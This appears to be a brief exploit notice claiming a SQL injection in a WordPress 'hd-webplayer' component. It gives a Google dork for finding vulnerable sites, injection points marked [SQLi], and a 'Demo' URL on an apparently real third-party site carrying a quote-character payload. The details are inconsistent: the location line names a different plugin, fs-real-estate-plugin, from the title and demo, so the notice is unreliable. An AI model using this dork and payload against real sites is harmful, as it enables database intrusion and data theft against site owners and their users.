# Exploit Title: Wordpress hd-webplayer Theme SQL Injection ((|))
# Google Dork: inurl:/hd-webplayer/config.php? ((|))
# Exploit Author: Novin hack #
# Category: Web Application #
# Tested on: Windows 7 #
#* Location: http://site.com/wp-content/ #
#* /plugins/fs-real-estate-plugin/ #
#* marker_listings.xml?id=?[SQLi] #
#* Demo: http://externXXXaffairs.ca/ea-sept9/wp-content/plugins/ #
#* hd-webplayer/config.php?id=null' #
#* Greetz to: * Arash.F * #